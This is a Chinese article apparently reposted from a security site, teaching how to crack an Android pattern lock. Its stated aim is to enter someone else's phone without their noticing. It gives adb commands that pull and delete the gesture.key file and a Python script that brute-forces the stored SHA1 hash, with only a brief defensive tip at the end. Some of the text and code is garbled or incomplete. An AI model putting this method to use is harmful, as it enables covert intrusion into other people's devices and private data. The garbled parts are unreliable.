当前位置： && 知识详情
教你如何破解安卓手机上的图形密码（九宫格锁）
阅读：1283859次
安卓手机的图形锁（九宫格）是3×3的点阵，按次序连接数个点从而达到锁定/解锁的功能。最少需要连接4个点，最多能连接9个点。网上也有暴力删除手机图形锁的方法，即直接干掉图形锁功能。但假如你想进入别人的手机，但又不想引起其警觉的话……你可以参考一下本文。前提条件：手机需要root，而且打开调试模式。一般来讲，如果用过诸如“豌豆荚手机助手”、“360手机助手”一类的软件，都会被要求打开调试模式的。如果要删除手机内置软件，则需要将手机root。原理分析首先科普一下，安卓手机是如何标记这9个点的。通过阅读安卓系统源码可知，每个点都有其编号，组成了一个3×3的矩阵，形如：00&01&02
06&07&08假如设定解锁图形为一个“L”形，如图：那么这几个点的排列顺序是这样的：00&03&06&07&08。系统就记下来了这一串数字，然后将这一串数字(以十六进制的方式)进行SHA1加密，存储在了手机里的/data/system/gesture.key&文件中。我们用数据线连接手机和电脑，然后ADB连接手机，将文件下载到电脑上（命令：adb pull /data/system/gesture.key gesture.key），如图：用WinHex等十六进制编辑程序打开gesture.key，会发现文件内是SHA1加密过的字符串：c8c0b24a15dc8bbfd，如图：当你下次解锁的时候，系统就对比你画的图案，看对应的数字串是不是对应的加密结果。如果是，就解锁；不是就继续保持锁定。那么，如果穷举所有的数字串排列，会有多少呢？联想到高中的阶乘，如果用4个点做解锁图形的话，就是9x8x7x6=3024种可能性，那5个点就是15120，6个点的话60480，7个点个点个点362880。总共是985824种可能性（但这么计算并不严密，因为同一条直线上的点只能和他们相邻的点相连）。满打满算，也不到985824种可能性。乍一看很大，但在计算机面前，穷举出来这些东西用不了几秒钟。破解过程知道了原理，就着手写程序来实现吧。这里使用了Python来完成任务。主要应用了（对字符串进行SHA1加密）和itertools模块（Python内置，生成00-09的排列组合）。主要流程为：1.ADB连接手机，获取gesture.key文件
2.读取key文件，存入字符串str_A
3.生成全部可能的数字串
4.对这些数字串进行加密，得到字符串str_B
5.将字符串str_A与str_B进行对比
6.如果字符串A，B相同，则说明数字串num就是想要的解锁顺序
7.打印出数字串num下面为程序：#&-*-&coding:&cp936&-*-
import&itertools
import&hashlib
import&time
#调用cmd，ADB连接到手机,读取SHA1加密后的字符串
os.system(&adb&pull&/data/system/gesture.key&gesture.key&)
time.sleep(5)
f=open('gesture.key','r')
pswd=f.readline()
pswd_hex=pswd.encode('hex')
print&'加密后的密码为：%s'%pswd_hex
#生成解锁序列，得到['00','01','02','03','04','05','06','07','08']
matrix=[]&
for&i&in&range(0,9):
&&&&str_temp&=&'0'+str(i)
&&&&matrix.append(str_temp)
#将00----08的字符进行排列，至少取4个数排列，最多全部进行排列
max_num=len(matrix)
for&num&in&range(min_num,max_num+1):#从04&-&&08
&&&&iter1&=&itertools.permutations(matrix,num)#从9个数字中挑出n个进行排列
&&&&list_m=[]
&&&&list_m.append(list(iter1))#将生成的排列全部存放到&list_m&列表中
&&&&for&el&in&list_m[0]:#遍历这n个数字的全部排列
&&&&&&&&strlist=''.join(el)#将list转换成str。[00,03,06,07,08]--&
&&&&&&&&strlist_sha1&=&hashlib.sha1(strlist.decode('hex')).hexdigest()#将字符串进行SHA1加密
&&&&&&&&if&pswd_hex==strlist_sha1:#将手机文件里的字符串与加密字符串进行对比
&&&&&&&&&&&&print&'解锁密码为：',strlist总结从程序本身来说，得到解锁密码后应该用break跳出循环并终止程序运行。但Python并没有跳出多重循环的语句，如果要跳出多重循环，只能设置标志位然后不停进行判定。为了运行速度就略去了“跳出循环”这个步骤。(有没有更好的实现跳出多重循环的方法？)另外也略去了很多容错语句。从破解目的来说，如果单单是忘记了自己的手机图形锁密码，完全可以用更简单的办法：ADB连接手机，然后“adb rm /data/system/gesture.key”删除掉gesture.key文件，此时图形锁就失效了，随意画一下就能解锁。但本文开篇假设的是“为了不被察觉地进入到别人的手机里”，所以就有了这篇文章。最后提一个安全小建议：如果手机已root，还要用“XX手机助手”，还想设置图形锁的话----在手机“设置”选项里，有一个“锁定状态下取消USB调试模式”(这个名字因手机而异，而且有的有此选项，有的手机就没有)，开启此功能之后，在手机锁定状态下就能够防范此类攻击了。此文技术原理很简单，还望各位大大传授些高大上的Python编程技巧。
本文转载自 freebuf
参与讨论，请先
安全播报APP
Copyright & 360网络攻防实验室 All Rights Reserved 京ICP证080047号[京ICP备号-6]